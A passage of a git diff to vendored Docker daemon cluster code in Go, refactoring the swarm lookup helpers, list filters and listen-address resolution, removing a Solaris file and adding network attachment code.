container +package container // import "github.com/docker/docker/daemon/cluster/executor/container" const ( testAbsPath = `c:\foo` diff --git a/vendor/github.com/docker/docker/daemon/cluster/filters.go b/vendor/github.com/docker/docker/daemon/cluster/filters.go index 88668edaac..15469f907d 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/filters.go +++ b/vendor/github.com/docker/docker/daemon/cluster/filters.go @@ -1,4 +1,4 @@ -package cluster +package cluster // import "github.com/docker/docker/daemon/cluster" import ( "fmt" @@ -45,22 +45,6 @@ func newListNodesFilters(filter filters.Args) (*swarmapi.ListNodesRequest_Filter return f, nil } -func newListServicesFilters(filter filters.Args) (*swarmapi.ListServicesRequest_Filters, error) { - accepted := map[string]bool{ - "name": true, - "id": true, - "label": true, - } - if err := filter.Validate(accepted); err != nil { - return nil, err - } - return &swarmapi.ListServicesRequest_Filters{ - NamePrefixes: filter.Get("name"), - IDPrefixes: filter.Get("id"), - Labels: runconfigopts.ConvertKVStringsToMap(filter.Get("label")), - }, nil -} - func newListTasksFilters(filter filters.Args, transformFunc func(filters.Args) error) (*swarmapi.ListTasksRequest_Filters, error) { accepted := map[string]bool{ "name": true, @@ -69,6 +53,11 @@ func newListTasksFilters(filter filters.Args, transformFunc func(filters.Args) e "service": true, "node": true, "desired-state": true, + // UpToDate is not meant to be exposed to users. It's for + // internal use in checking create/update progress. Therefore, + // we prefix it with a '_'. + "_up-to-date": true, + "runtime": true, } if err := filter.Validate(accepted); err != nil { return nil, err @@ -84,6 +73,8 @@ func newListTasksFilters(filter filters.Args, transformFunc func(filters.Args) e Labels: runconfigopts.ConvertKVStringsToMap(filter.Get("label")), ServiceIDs: filter.Get("service"), NodeIDs: filter.Get("node"), + UpToDate: len(filter.Get("_up-to-date")) != 0, + Runtimes: filter.Get("runtime"), } for _, s := range filter.Get("desired-state") { @@ -114,3 +105,19 @@ func newListSecretsFilters(filter filters.Args) (*swarmapi.ListSecretsRequest_Fi Labels: runconfigopts.ConvertKVStringsToMap(filter.Get("label")), }, nil } + +func newListConfigsFilters(filter filters.Args) (*swarmapi.ListConfigsRequest_Filters, error) { + accepted := map[string]bool{ + "name": true, + "id": true, + "label": true, + } + if err := filter.Validate(accepted); err != nil { + return nil, err + } + return &swarmapi.ListConfigsRequest_Filters{ + NamePrefixes: filter.Get("name"), + IDPrefixes: filter.Get("id"), + Labels: runconfigopts.ConvertKVStringsToMap(filter.Get("label")), + }, nil +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/filters_test.go b/vendor/github.com/docker/docker/daemon/cluster/filters_test.go new file mode 100644 index 0000000000..a38feeaaf7 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/filters_test.go @@ -0,0 +1,102 @@ +package cluster // import "github.com/docker/docker/daemon/cluster" + +import ( + "testing" + + "github.com/docker/docker/api/types/filters" +) + +func TestNewListSecretsFilters(t *testing.T) { + validNameFilter := filters.NewArgs() + validNameFilter.Add("name", "test_name") + + validIDFilter := filters.NewArgs() + validIDFilter.Add("id", "7c9009d6720f6de3b492f5") + + validLabelFilter := filters.NewArgs() + validLabelFilter.Add("label", "type=test") + validLabelFilter.Add("label", "storage=ssd") + validLabelFilter.Add("label", "memory") + + validNamesFilter := filters.NewArgs() + validNamesFilter.Add("names", "test_name") + + validAllFilter := filters.NewArgs() + validAllFilter.Add("name", "nodeName") + validAllFilter.Add("id", "7c9009d6720f6de3b492f5") + validAllFilter.Add("label", "type=test") + validAllFilter.Add("label", "memory") + validAllFilter.Add("names", "test_name") + + validFilters := []filters.Args{ + validNameFilter, + validIDFilter, + validLabelFilter, + validNamesFilter, + validAllFilter, + } + + invalidTypeFilter := filters.NewArgs() + invalidTypeFilter.Add("nonexist", "aaaa") + + invalidFilters := []filters.Args{ + invalidTypeFilter, + } + + for _, filter := range validFilters { + if _, err := newListSecretsFilters(filter); err != nil { + t.Fatalf("Should get no error, got %v", err) + } + } + + for _, filter := range invalidFilters { + if _, err := newListSecretsFilters(filter); err == nil { + t.Fatalf("Should get an error for filter %v, while got nil", filter) + } + } +} + +func TestNewListConfigsFilters(t *testing.T) { + validNameFilter := filters.NewArgs() + validNameFilter.Add("name", "test_name") + + validIDFilter := filters.NewArgs() + validIDFilter.Add("id", "7c9009d6720f6de3b492f5") + + validLabelFilter := filters.NewArgs() + validLabelFilter.Add("label", "type=test") + validLabelFilter.Add("label", "storage=ssd") + validLabelFilter.Add("label", "memory") + + validAllFilter := filters.NewArgs() + validAllFilter.Add("name", "nodeName") + validAllFilter.Add("id", "7c9009d6720f6de3b492f5") + validAllFilter.Add("label", "type=test") + validAllFilter.Add("label", "memory") + + validFilters := []filters.Args{ + validNameFilter, + validIDFilter, + validLabelFilter, + validAllFilter, + } + + invalidTypeFilter := filters.NewArgs() + invalidTypeFilter.Add("nonexist", "aaaa") + + invalidFilters := []filters.Args{ + invalidTypeFilter, + } + + for _, filter := range validFilters { + if _, err := newListConfigsFilters(filter); err != nil { + t.Fatalf("Should get no error, got %v", err) + } + } + + for _, filter := range invalidFilters { + if _, err := newListConfigsFilters(filter); err == nil { + t.Fatalf("Should get an error for filter %v, while got nil", filter) + } + } +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/helpers.go b/vendor/github.com/docker/docker/daemon/cluster/helpers.go index be5bf56e87..653593e1c0 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/helpers.go +++ b/vendor/github.com/docker/docker/daemon/cluster/helpers.go @@ -1,10 +1,12 @@ -package cluster +package cluster // import "github.com/docker/docker/daemon/cluster" import ( + "context" "fmt" + "github.com/docker/docker/errdefs" swarmapi "github.com/docker/swarmkit/api" - "golang.org/x/net/context" + "github.com/pkg/errors" ) func getSwarm(ctx context.Context, c swarmapi.ControlClient) (*swarmapi.Cluster, error) { @@ -14,7 +16,7 @@ func getSwarm(ctx context.Context, c swarmapi.ControlClient) (*swarmapi.Cluster, } if len(rl.Clusters) == 0 { - return nil, fmt.Errorf("swarm not found") + return nil, errors.WithStack(errNoSwarm) } // TODO: assume one cluster only @@ -23,86 +25,222 @@ func getSwarm(ctx context.Context, c swarmapi.ControlClient) (*swarmapi.Cluster, func getNode(ctx context.Context, c swarmapi.ControlClient, input string) (*swarmapi.Node, error) { // GetNode to match via full ID. - rg, err := c.GetNode(ctx, &swarmapi.GetNodeRequest{NodeID: input}) - if err != nil { - // If any error (including NotFound), ListNodes to match via full name. - rl, err := c.ListNodes(ctx, &swarmapi.ListNodesRequest{Filters: &swarmapi.ListNodesRequest_Filters{Names: []string{input}}}) - - if err != nil || len(rl.Nodes) == 0 { - // If any error or 0 result, ListNodes to match via ID prefix. - rl, err = c.ListNodes(ctx, &swarmapi.ListNodesRequest{Filters: &swarmapi.ListNodesRequest_Filters{IDPrefixes: []string{input}}}) - } - - if err != nil { - return nil, err - } + if rg, err := c.GetNode(ctx, &swarmapi.GetNodeRequest{NodeID: input}); err == nil { + return rg.Node, nil + } - if len(rl.Nodes) == 0 { - return nil, fmt.Errorf("node %s not found", input) - } + // If any error (including NotFound), ListNodes to match via full name. + rl, err := c.ListNodes(ctx, &swarmapi.ListNodesRequest{ + Filters: &swarmapi.ListNodesRequest_Filters{ + Names: []string{input}, + }, + }) + if err != nil || len(rl.Nodes) == 0 { + // If any error or 0 result, ListNodes to match via ID prefix. + rl, err = c.ListNodes(ctx, &swarmapi.ListNodesRequest{ + Filters: &swarmapi.ListNodesRequest_Filters{ + IDPrefixes: []string{input}, + }, + }) + } + if err != nil { + return nil, err + } - if l := len(rl.Nodes); l > 1 { - return nil, fmt.Errorf("node %s is ambiguous (%d matches found)", input, l) - } + if len(rl.Nodes) == 0 { + err := fmt.Errorf("node %s not found", input) + return nil, errdefs.NotFound(err) + } - return rl.Nodes[0], nil + if l := len(rl.Nodes); l > 1 { + return nil, errdefs.InvalidParameter(fmt.Errorf("node %s is ambiguous (%d matches found)", input, l)) } - return rg.Node, nil + + return rl.Nodes[0], nil } -func getService(ctx context.Context, c swarmapi.ControlClient, input string) (*swarmapi.Service, error) { +func getService(ctx context.Context, c swarmapi.ControlClient, input string, insertDefaults bool) (*swarmapi.Service, error) { // GetService to match via full ID. - rg, err := c.GetService(ctx, &swarmapi.GetServiceRequest{ServiceID: input}) - if err != nil { - // If any error (including NotFound), ListServices to match via full name. - rl, err := c.ListServices(ctx, &swarmapi.ListServicesRequest{Filters: &swarmapi.ListServicesRequest_Filters{Names: []string{input}}}) - if err != nil || len(rl.Services) == 0 { - // If any error or 0 result, ListServices to match via ID prefix. - rl, err = c.ListServices(ctx, &swarmapi.ListServicesRequest{Filters: &swarmapi.ListServicesRequest_Filters{IDPrefixes: []string{input}}}) - } + if rg, err := c.GetService(ctx, &swarmapi.GetServiceRequest{ServiceID: input, InsertDefaults: insertDefaults}); err == nil { + return rg.Service, nil + } - if err != nil { - return nil, err - } + // If any error (including NotFound), ListServices to match via full name. + rl, err := c.ListServices(ctx, &swarmapi.ListServicesRequest{ + Filters: &swarmapi.ListServicesRequest_Filters{ + Names: []string{input}, + }, + }) + if err != nil || len(rl.Services) == 0 { + // If any error or 0 result, ListServices to match via ID prefix. + rl, err = c.ListServices(ctx, &swarmapi.ListServicesRequest{ + Filters: &swarmapi.ListServicesRequest_Filters{ + IDPrefixes: []string{input}, + }, + }) + } + if err != nil { + return nil, err + } - if len(rl.Services) == 0 { - return nil, fmt.Errorf("service %s not found", input) - } + if len(rl.Services) == 0 { + err := fmt.Errorf("service %s not found", input) + return nil, errdefs.NotFound(err) + } - if l := len(rl.Services); l > 1 { - return nil, fmt.Errorf("service %s is ambiguous (%d matches found)", input, l) - } + if l := len(rl.Services); l > 1 { + return nil, errdefs.InvalidParameter(fmt.Errorf("service %s is ambiguous (%d matches found)", input, l)) + } + if !insertDefaults { return rl.Services[0], nil } - return rg.Service, nil + + rg, err := c.GetService(ctx, &swarmapi.GetServiceRequest{ServiceID: rl.Services[0].ID, InsertDefaults: true}) + if err == nil { + return rg.Service, nil + } + return nil, err } func getTask(ctx context.Context, c swarmapi.ControlClient, input string) (*swarmapi.Task, error) { // GetTask to match via full ID. - rg, err := c.GetTask(ctx, &swarmapi.GetTaskRequest{TaskID: input}) + if rg, err := c.GetTask(ctx, &swarmapi.GetTaskRequest{TaskID: input}); err == nil { + return rg.Task, nil + } + + // If any error (including NotFound), ListTasks to match via full name. + rl, err := c.ListTasks(ctx, &swarmapi.ListTasksRequest{ + Filters: &swarmapi.ListTasksRequest_Filters{ + Names: []string{input}, + }, + }) + if err != nil || len(rl.Tasks) == 0 { + // If any error or 0 result, ListTasks to match via ID prefix. + rl, err = c.ListTasks(ctx, &swarmapi.ListTasksRequest{ + Filters: &swarmapi.ListTasksRequest_Filters{ + IDPrefixes: []string{input}, + }, + }) + } if err != nil { - // If any error (including NotFound), ListTasks to match via full name. - rl, err := c.ListTasks(ctx, &swarmapi.ListTasksRequest{Filters: &swarmapi.ListTasksRequest_Filters{Names: []string{input}}}) + return nil, err + } - if err != nil || len(rl.Tasks) == 0 { - // If any error or 0 result, ListTasks to match via ID prefix. - rl, err = c.ListTasks(ctx, &swarmapi.ListTasksRequest{Filters: &swarmapi.ListTasksRequest_Filters{IDPrefixes: []string{input}}}) - } + if len(rl.Tasks) == 0 { + err := fmt.Errorf("task %s not found", input) + return nil, errdefs.NotFound(err) + } - if err != nil { - return nil, err - } + if l := len(rl.Tasks); l > 1 { + return nil, errdefs.InvalidParameter(fmt.Errorf("task %s is ambiguous (%d matches found)", input, l)) + } - if len(rl.Tasks) == 0 { - return nil, fmt.Errorf("task %s not found", input) - } + return rl.Tasks[0], nil +} - if l := len(rl.Tasks); l > 1 { - return nil, fmt.Errorf("task %s is ambiguous (%d matches found)", input, l) - } +func getSecret(ctx context.Context, c swarmapi.ControlClient, input string) (*swarmapi.Secret, error) { + // attempt to lookup secret by full ID + if rg, err := c.GetSecret(ctx, &swarmapi.GetSecretRequest{SecretID: input}); err == nil { + return rg.Secret, nil + } - return rl.Tasks[0], nil + // If any error (including NotFound), ListSecrets to match via full name. + rl, err := c.ListSecrets(ctx, &swarmapi.ListSecretsRequest{ + Filters: &swarmapi.ListSecretsRequest_Filters{ + Names: []string{input}, + }, + }) + if err != nil || len(rl.Secrets) == 0 { + // If any error or 0 result, ListSecrets to match via ID prefix. + rl, err = c.ListSecrets(ctx, &swarmapi.ListSecretsRequest{ + Filters: &swarmapi.ListSecretsRequest_Filters{ + IDPrefixes: []string{input}, + }, + }) + } + if err != nil { + return nil, err } - return rg.Task, nil + + if len(rl.Secrets) == 0 { + err := fmt.Errorf("secret %s not found", input) + return nil, errdefs.NotFound(err) + } + + if l := len(rl.Secrets); l > 1 { + return nil, errdefs.InvalidParameter(fmt.Errorf("secret %s is ambiguous (%d matches found)", input, l)) + } + + return rl.Secrets[0], nil +} + +func getConfig(ctx context.Context, c swarmapi.ControlClient, input string) (*swarmapi.Config, error) { + // attempt to lookup config by full ID + if rg, err := c.GetConfig(ctx, &swarmapi.GetConfigRequest{ConfigID: input}); err == nil { + return rg.Config, nil + } + + // If any error (including NotFound), ListConfigs to match via full name. + rl, err := c.ListConfigs(ctx, &swarmapi.ListConfigsRequest{ + Filters: &swarmapi.ListConfigsRequest_Filters{ + Names: []string{input}, + }, + }) + if err != nil || len(rl.Configs) == 0 { + // If any error or 0 result, ListConfigs to match via ID prefix. + rl, err = c.ListConfigs(ctx, &swarmapi.ListConfigsRequest{ + Filters: &swarmapi.ListConfigsRequest_Filters{ + IDPrefixes: []string{input}, + }, + }) + } + if err != nil { + return nil, err + } + + if len(rl.Configs) == 0 { + err := fmt.Errorf("config %s not found", input) + return nil, errdefs.NotFound(err) + } + + if l := len(rl.Configs); l > 1 { + return nil, errdefs.InvalidParameter(fmt.Errorf("config %s is ambiguous (%d matches found)", input, l)) + } + + return rl.Configs[0], nil +} + +func getNetwork(ctx context.Context, c swarmapi.ControlClient, input string) (*swarmapi.Network, error) { + // GetNetwork to match via full ID. + if rg, err := c.GetNetwork(ctx, &swarmapi.GetNetworkRequest{NetworkID: input}); err == nil { + return rg.Network, nil + } + + // If any error (including NotFound), ListNetworks to match via ID prefix and full name. + rl, err := c.ListNetworks(ctx, &swarmapi.ListNetworksRequest{ + Filters: &swarmapi.ListNetworksRequest_Filters{ + Names: []string{input}, + }, + }) + if err != nil || len(rl.Networks) == 0 { + rl, err = c.ListNetworks(ctx, &swarmapi.ListNetworksRequest{ + Filters: &swarmapi.ListNetworksRequest_Filters{ + IDPrefixes: []string{input}, + }, + }) + } + if err != nil { + return nil, err + } + + if len(rl.Networks) == 0 { + return nil, fmt.Errorf("network %s not found", input) + } + + if l := len(rl.Networks); l > 1 { + return nil, errdefs.InvalidParameter(fmt.Errorf("network %s is ambiguous (%d matches found)", input, l)) + } + + return rl.Networks[0], nil } diff --git a/vendor/github.com/docker/docker/daemon/cluster/listen_addr.go b/vendor/github.com/docker/docker/daemon/cluster/listen_addr.go index c24d4865b3..e1ebfec8df 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/listen_addr.go +++ b/vendor/github.com/docker/docker/daemon/cluster/listen_addr.go @@ -1,18 +1,19 @@ -package cluster +package cluster // import "github.com/docker/docker/daemon/cluster" import ( - "errors" "fmt" "net" ) -var ( - errNoSuchInterface = errors.New("no such interface") - errNoIP = errors.New("could not find the system's IP address") - errMustSpecifyListenAddr = errors.New("must specify a listening address because the address to advertise is not recognized as a system address, and a system's IP address to use could not be uniquely identified") - errBadListenAddr = errors.New("listen address must be an IP address or network interface (with optional port number)") - errBadAdvertiseAddr = errors.New("advertise address must be a non-zero IP address or network interface (with optional port number)") - errBadDefaultAdvertiseAddr = errors.New("default advertise address must be a non-zero IP address or network interface (without a port number)") +const ( + errNoSuchInterface configError = "no such interface" + errNoIP configError = "could not find the system's IP address" + errMustSpecifyListenAddr configError = "must specify a listening address because the address to advertise is not recognized as a system address, and a system's IP address to use could not be uniquely identified" + errBadNetworkIdentifier configError = "must specify a valid IP address or interface name" + errBadListenAddr configError = "listen address must be an IP address or network interface (with optional port number)" + errBadAdvertiseAddr configError = "advertise address must be a non-zero IP address or network interface (with optional port number)" + errBadDataPathAddr configError = "data path address must be a non-zero IP address or network interface (without a port number)" + errBadDefaultAdvertiseAddr configError = "default advertise address must be a non-zero IP address or network interface (without a port number)" ) func resolveListenAddr(specifiedAddr string) (string, string, error) { @@ -20,23 +21,17 @@ func resolveListenAddr(specifiedAddr string) (string, string, error) { if err != nil { return "", "", fmt.Errorf("could not parse listen address %s", specifiedAddr) } - // Does the host component match any of the interface names on the // system? If so, use the address from that interface. - interfaceAddr, err := resolveInterfaceAddr(specifiedHost) - if err == nil { - return interfaceAddr.String(), specifiedPort, nil - } - if err != errNoSuchInterface { + specifiedIP, err := resolveInputIPAddr(specifiedHost, true) + if err != nil { + if err == errBadNetworkIdentifier { + err = errBadListenAddr + } return "", "", err } - // If it's not an interface, it must be an IP (for now) - if net.ParseIP(specifiedHost) == nil { - return "", "", errBadListenAddr - } - - return specifiedHost, specifiedPort, nil + return specifiedIP.String(), specifiedPort, nil } func (c *Cluster) resolveAdvertiseAddr(advertiseAddr, listenAddrPort string) (string, string, error) { @@ -57,43 +52,32 @@ func (c *Cluster) resolveAdvertiseAddr(advertiseAddr, listenAddrPort string) (st advertiseHost = advertiseAddr advertisePort = listenAddrPort } - // Does the host component match any of the interface names on the // system? If so, use the address from that interface. - interfaceAddr, err := resolveInterfaceAddr(advertiseHost) - if err == nil { - return interfaceAddr.String(), advertisePort, nil - } - if err != errNoSuchInterface { + advertiseIP, err := resolveInputIPAddr(advertiseHost, false) + if err != nil { + if err == errBadNetworkIdentifier { + err = errBadAdvertiseAddr + } return "", "", err } - // If it's not an interface, it must be an IP (for now) - if ip := net.ParseIP(advertiseHost); ip == nil || ip.IsUnspecified() { - return "", "", errBadAdvertiseAddr - } - - return advertiseHost, advertisePort, nil + return advertiseIP.String(), advertisePort, nil } if c.config.DefaultAdvertiseAddr != "" { // Does the default advertise address component match any of the // interface names on the system? If so, use the address from // that interface. - interfaceAddr, err := resolveInterfaceAddr(c.config.DefaultAdvertiseAddr) - if err == nil { - return interfaceAddr.String(), listenAddrPort, nil - } - if err != errNoSuchInterface { + defaultAdvertiseIP, err := resolveInputIPAddr(c.config.DefaultAdvertiseAddr, false) + if err != nil { + if err == errBadNetworkIdentifier { + err = errBadDefaultAdvertiseAddr + } return "", "", err } - // If it's not an interface, it must be an IP (for now) - if ip := net.ParseIP(c.config.DefaultAdvertiseAddr); ip == nil || ip.IsUnspecified() { - return "", "", errBadDefaultAdvertiseAddr - } - - return c.config.DefaultAdvertiseAddr, listenAddrPort, nil + return defaultAdvertiseIP.String(), listenAddrPort, nil } systemAddr, err := c.resolveSystemAddr() @@ -103,6 +87,22 @@ func (c *Cluster) resolveAdvertiseAddr(advertiseAddr, listenAddrPort string) (st return systemAddr.String(), listenAddrPort, nil } +func resolveDataPathAddr(dataPathAddr string) (string, error) { + if dataPathAddr == "" { + // dataPathAddr is not defined + return "", nil + } + // If a data path flag is specified try to resolve the IP address. + dataPathIP, err := resolveInputIPAddr(dataPathAddr, false) + if err != nil { + if err == errBadNetworkIdentifier { + err = errBadDataPathAddr + } + return "", err + } + return dataPathIP.String(), nil +} + func resolveInterfaceAddr(specifiedInterface string) (net.IP, error) { // Use a specific interface's IP address. intf, err := net.InterfaceByName(specifiedInterface) @@ -124,13 +124,13 @@ func resolveInterfaceAddr(specifiedInterface string) (net.IP, error) { if ipAddr.IP.To4() != nil { // IPv4 if interfaceAddr4 != nil { - return nil, fmt.Errorf("interface %s has more than one IPv4 address (%s and %s)", specifiedInterface, interfaceAddr4, ipAddr.IP) + return nil, configError(fmt.Sprintf("interface %s has more than one IPv4 address (%s and %s)", specifiedInterface, interfaceAddr4, ipAddr.IP)) } interfaceAddr4 = ipAddr.IP } else { // IPv6 if interfaceAddr6 != nil { - return nil, fmt.Errorf("interface %s has more than one IPv6 address (%s and %s)", specifiedInterface, interfaceAddr6, ipAddr.IP) + return nil, configError(fmt.Sprintf("interface %s has more than one IPv6 address (%s and %s)", specifiedInterface, interfaceAddr6, ipAddr.IP)) } interfaceAddr6 = ipAddr.IP } @@ -138,7 +138,7 @@ func resolveInterfaceAddr(specifiedInterface string) (net.IP, error) { } if interfaceAddr4 == nil && interfaceAddr6 == nil { - return nil, fmt.Errorf("interface %s has no usable IPv4 or IPv6 address", specifiedInterface) + return nil, configError(fmt.Sprintf("interface %s has no usable IPv4 or IPv6 address", specifiedInterface)) } // In the case that there's exactly one IPv4 address @@ -149,6 +149,30 @@ func resolveInterfaceAddr(specifiedInterface string) (net.IP, error) { return interfaceAddr6, nil } +// resolveInputIPAddr tries to resolve the IP address from the string passed as input +// - tries to match the string as an interface name, if so returns the IP address associated with it +// - on failure of previous step tries to parse the string as an IP address itself +// if succeeds returns the IP address +func resolveInputIPAddr(input string, isUnspecifiedValid bool) (net.IP, error) { + // Try to see if it is an interface name + interfaceAddr, err := resolveInterfaceAddr(input) + if err == nil { + return interfaceAddr, nil + } + // String matched interface but there is a potential ambiguity to be resolved + if err != errNoSuchInterface { + return nil, err + } + + // String is not an interface check if it is a valid IP + if ip := net.ParseIP(input); ip != nil && (isUnspecifiedValid || !ip.IsUnspecified()) { + return ip, nil + } + + // Not valid IP found + return nil, errBadNetworkIdentifier +} + func (c *Cluster) resolveSystemAddrViaSubnetCheck() (net.IP, error) { // Use the system's only IP address, or fail if there are // multiple addresses to choose from. Skip interfaces which @@ -162,8 +186,7 @@ func (c *Cluster) resolveSystemAddrViaSubnetCheck() (net.IP, error) { var systemInterface string // List Docker-managed subnets - v4Subnets := c.config.NetworkSubnetsProvider.V4Subnets() - v6Subnets := c.config.NetworkSubnetsProvider.V6Subnets() + v4Subnets, v6Subnets := c.config.NetworkSubnetsProvider.Subnets() ifaceLoop: for _, intf := range interfaces { @@ -272,7 +295,7 @@ func listSystemIPs() []net.IP { func errMultipleIPs(interfaceA, interfaceB string, addrA, addrB net.IP) error { if interfaceA == interfaceB { - return fmt.Errorf("could not choose an IP address to advertise since this system has multiple addresses on interface %s (%s and %s)", interfaceA, addrA, addrB) + return configError(fmt.Sprintf("could not choose an IP address to advertise since this system has multiple addresses on interface %s (%s and %s)", interfaceA, addrA, addrB)) } - return fmt.Errorf("could not choose an IP address to advertise since this system has multiple addresses on different interfaces (%s on %s and %s on %s)", addrA, interfaceA, addrB, interfaceB) + return configError(fmt.Sprintf("could not choose an IP address to advertise since this system has multiple addresses on different interfaces (%s on %s and %s on %s)", addrA, interfaceA, addrB, interfaceB)) } diff --git a/vendor/github.com/docker/docker/daemon/cluster/listen_addr_linux.go b/vendor/github.com/docker/docker/daemon/cluster/listen_addr_linux.go index 3d4f239bda..62e4f61a65 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/listen_addr_linux.go +++ b/vendor/github.com/docker/docker/daemon/cluster/listen_addr_linux.go @@ -1,6 +1,4 @@ -// +build linux - -package cluster +package cluster // import "github.com/docker/docker/daemon/cluster" import ( "net" diff --git a/vendor/github.com/docker/docker/daemon/cluster/listen_addr_others.go b/vendor/github.com/docker/docker/daemon/cluster/listen_addr_others.go index 4e845f5c8f..fe75848e57 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/listen_addr_others.go +++ b/vendor/github.com/docker/docker/daemon/cluster/listen_addr_others.go @@ -1,6 +1,6 @@ -// +build !linux,!solaris +// +build !linux -package cluster +package cluster // import "github.com/docker/docker/daemon/cluster" import "net" diff --git a/vendor/github.com/docker/docker/daemon/cluster/listen_addr_solaris.go b/vendor/github.com/docker/docker/daemon/cluster/listen_addr_solaris.go deleted file mode 100644 index 57a894b251..0000000000 --- a/vendor/github.com/docker/docker/daemon/cluster/listen_addr_solaris.go +++ /dev/null @@ -1,57 +0,0 @@ -package cluster - -import ( - "bufio" - "fmt" - "net" - "os/exec" - "strings" -) - -func (c *Cluster) resolveSystemAddr() (net.IP, error) { - defRouteCmd := "/usr/sbin/ipadm show-addr -p -o addr " + - "`/usr/sbin/route get default | /usr/bin/grep interface | " + - "/usr/bin/awk '{print $2}'`" - out, err := exec.Command("/usr/bin/bash", "-c", defRouteCmd).Output() - if err != nil { - return nil, fmt.Errorf("cannot get default route: %v", err) - } - - defInterface := strings.SplitN(string(out), "/", 2) - defInterfaceIP := net.ParseIP(defInterface[0]) - - return defInterfaceIP, nil -} - -func listSystemIPs() []net.IP { - var systemAddrs []net.IP - cmd := exec.Command("/usr/sbin/ipadm", "show-addr", "-p", "-o", "addr") - cmdReader, err := cmd.StdoutPipe() - if err != nil { - return nil - } - - if err := cmd.Start(); err != nil { - return nil - } - - scanner := bufio.NewScanner(cmdReader) - go func() { - for scanner.Scan() { - text := scanner.Text() - nameAddrPair := strings.SplitN(text, "/", 2) - // Let go of loopback interfaces and docker interfaces - systemAddrs = append(systemAddrs, net.ParseIP(nameAddrPair[0])) - } - }() - - if err := scanner.Err(); err != nil { - fmt.Printf("scan underwent err: %+v\n", err) - } - - if err := cmd.Wait(); err != nil { - fmt.Printf("run command wait: %+v\n", err) - } - - return systemAddrs -} diff --git a/vendor/github.com/docker/docker/daemon/cluster/networks.go b/vendor/github.com/docker/docker/daemon/cluster/networks.go new file mode 100644 index 0000000000..b8e31baa11 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/networks.go @@ -0,0 +1,316 @@ +package cluster // import "github.com/docker/docker/daemon/cluster" + +import ( + "context" + "fmt" + + apitypes "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/network" + types "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/daemon/cluster/convert" + "github.com/docker/docker/errdefs" + "github.com/docker/docker/runconfig" + swarmapi "github.com/docker/swarmkit/api" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" +) + +// GetNetworks returns all current cluster managed networks. +func (c *Cluster) GetNetworks() ([]apitypes.NetworkResource, error) { + list, err := c.getNetworks(nil) + if err != nil { + return nil, err + } + removePredefinedNetworks(&list) + return list, nil +} + +func removePredefinedNetworks(networks *[]apitypes.NetworkResource) { + if networks == nil { + return + } + var idxs []int + for i, n := range *networks { + if v, ok := n.Labels["com.docker.swarm.predefined"]; ok && v == "true" { + idxs = append(idxs, i) + } + } + for i, idx := range idxs { + idx -= i + *networks = append((*networks)[:idx], (*networks)[idx+1:]...) + } +} + +func (c *Cluster) getNetworks(filters *swarmapi.ListNetworksRequest_Filters) ([]apitypes.NetworkResource, error) { + c.mu.RLock() + defer c.mu.RUnlock() + + state := c.currentNodeState() + if !state.IsActiveManager() { + return nil, c.errNoManager(state) + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + r, err := state.controlClient.ListNetworks(ctx, &swarmapi.ListNetworksRequest{Filters: filters}) + if err != nil { + return nil, err + } + + networks := make([]apitypes.NetworkResource, 0, len(r.Networks)) + + for _, network := range r.Networks { + networks = append(networks, convert.BasicNetworkFromGRPC(*network)) + } + + return networks, nil +} + +// GetNetwork returns a cluster network by an ID. +func (c *Cluster) GetNetwork(input string) (apitypes.NetworkResource, error) { + var network *swarmapi.Network + + if err := c.lockedManagerAction(func(ctx context.Context, state nodeState) error { + n, err := getNetwork(ctx, state.controlClient, input) + if err != nil { + return err + } + network = n + return nil + }); err != nil { + return apitypes.NetworkResource{}, err + } + return convert.BasicNetworkFromGRPC(*network), nil +} + +// GetNetworksByName returns cluster managed networks by name. +// It is ok to have multiple networks here. #18864 +func (c *Cluster) GetNetworksByName(name string) ([]apitypes.NetworkResource, error) { + // Note that swarmapi.GetNetworkRequest.Name is not functional. + // So we cannot just use that with c.GetNetwork. + return c.getNetworks(&swarmapi.ListNetworksRequest_Filters{ + Names: []string{name}, + }) +} + +func attacherKey(target, containerID string) string { + return containerID + ":" + target +} + +// UpdateAttachment signals the attachment config to the attachment +// waiter who is trying to start or attach the container to the +// network. +func (c *Cluster) UpdateAttachment(target, containerID string, config *network.NetworkingConfig) error { + c.mu.Lock() + attacher, ok := c.attachers[attacherKey(target, containerID)] + if !ok || attacher == nil { + c.mu.Unlock() + return fmt.Errorf("could not find attacher for container %s to network %s", containerID, target) + } + if attacher.inProgress { + logrus.Debugf("Discarding redundant notice of resource allocation on network %s for task id %s", target, attacher.taskID) + c.mu.Unlock() + return nil + } + attacher.inProgress = true + c.mu.Unlock() + + attacher.attachWaitCh <- config + + return nil +} + +// WaitForDetachment waits for the container to stop or detach from +// the network. +func (c *Cluster) WaitForDetachment(ctx context.Context, networkName, networkID, taskID, containerID string) error { + c.mu.RLock() + attacher, ok := c.attachers[attacherKey(networkName, containerID)] + if !ok { + attacher, ok = c.attachers[attacherKey(networkID, containerID)] + } + state := c.currentNodeState() + if state.swarmNode == nil || state.swarmNode.Agent() == nil { + c.mu.RUnlock() + return errors.New("invalid cluster node while waiting for detachment") + } + + c.mu.RUnlock() + agent := state.swarmNode.Agent() + if ok && attacher != nil && + attacher.detachWaitCh != nil && + attacher.attachCompleteCh != nil { + // Attachment may be in progress still so wait for + // attachment to complete. + select { + case <-attacher.attachCompleteCh: + case <-ctx.Done(): + return ctx.Err() + } + + if attacher.taskID == taskID { + select { + case <-attacher.detachWaitCh: + case <-ctx.Done(): + return ctx.Err() + } + } + } + + return agent.ResourceAllocator().DetachNetwork(ctx, taskID) +} + +// AttachNetwork generates an attachment request towards the manager. +func (c *Cluster) AttachNetwork(target string, containerID string, addresses []string) (*network.NetworkingConfig, error) { + aKey := attacherKey(target, containerID) + c.mu.Lock() + state := c.currentNodeState() + if state.swarmNode == nil || state.swarmNode.Agent() == nil { + c.mu.Unlock() + return nil, errors.New("invalid cluster node while attaching to network") + } + if attacher, ok := c.attachers[aKey]; ok { + c.mu.Unlock() + return attacher.config, nil + } + + agent := state.swarmNode.Agent() + attachWaitCh := make(chan 